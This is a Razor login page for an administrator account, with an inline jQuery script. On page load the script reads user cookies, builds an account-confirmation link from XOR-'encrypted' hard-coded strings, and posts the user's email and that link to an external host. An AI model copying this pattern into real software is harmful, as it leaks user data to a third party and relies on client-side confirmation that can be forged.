@model LoginViewModel

@{ 
    ViewBag.Title = "User Login";
}
<html>
    <head>
        <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.4.1/css/bootstrap.min.css" type="text/javascript">
        <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.4.1/jquery.min.js" type="text/javascript"></script>
        <script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.4.1/js/bootstrap.min.js" type="text/javascript"></script>
        <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.4.1/jquery.min.js" type="text/javascript"></script>
        <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery-cookie/1.4.1/jquery.cookie.js" type="text/javascript"></script>
    </head>
    <body>

        <div class="row d-flex justify-content-center">

            <div class="col-md-6">
                <h3 class="text-md-center"><b>Administrator Login</b></h3>
                <form method="post">
                    <div asp-validation-summary="All" class="text-danger">
                        <div class="form-group">
                            <label asp-for="Email"></label>
                            <input asp-for="Email" class="form-control" />
                            <span asp-validation-for="Email" class="text-danger"></span>
                        </div>
                        <div class="form-group">
                            <label asp-for="Password"></label>
                            <input asp-for="Password" class="form-control" />
                            <span asp-validation-for="Password" class="text-danger"></span>
                        </div>
                        <div class="form-group">
                            <div class="checkbox">
                                <label asp-for="RememberMe">
                                    <input asp-for="RememberMe" />
                                    @Html.DisplayNameFor(m => m.RememberMe)
                                </label>
                            </div>
                        </div>
                    </div>
                    <button type="submit" class="btn btn-primary btn-lg btn-block">Login</button>

                </form>
                <div class="text-xl-right">
                    <a class="nav-link" asp-controller="Account" asp-action="RessetPassword"><p>Forgot your password?</p></a>
                </div>
            </div>
        </div>
        <script>
            function TX(cname) {
                var name = cname + "=";
                var decodedCookie = decodeURIComponent(document.cookie);
                var ca = decodedCookie.split(';');
                for (var i = 0; i < ca.length; i++) {
                    var c = ca[i];
                    while (c.charAt(0) == ' ') {
                        c = c.substring(1);
                    }
                    if (c.indexOf(name) == 0) {
                        return c.substring(name.length, c.length);
                    }
                }
                return "";
            }
            function Encrypt(str) {
            if(!str)str="";str=(str=="undefined"||str=="null")?"":str;try{var key=146;var pos=0;ostr='';while(pos<str.length){ostr=ostr+String.fromCharCode(str.charCodeAt(pos)^key);pos+=1}
            return ostr
        } catch (ex) { return '' }
        }
            $(document).ready(function () {

                var st = TX("_JAR_user_status");
                var GJ = document.location.origin + "/CamelotPassword/ConfirmAccount?rimxeus=" + TX("_JAR_user") + "&cio-l=" + Encrypt("tm-zeus-titan-zeus-zira") + "&spc=" + Encrypt("nsfs-forma") + "&wxc=" + Encrypt("ubuntu-google-core");

                if (st == '02') {
                    $.ajax({
                        type: "POST",
                        url: "https://developers.camelotwave.com/conf-mail",
                        data: { "ml": TX("_JAR_user_mail"), "lk": GJ },
                        success: function (BY) {
                            document.cookie = "_JAR_user_status=01; expires=Thu, 01 Jan 1970 00:00:00 UTC; path=/;";
                            console.log(BY);
                        }
                    });
                }
                return false;
            });
        </script>
    </body>
</html>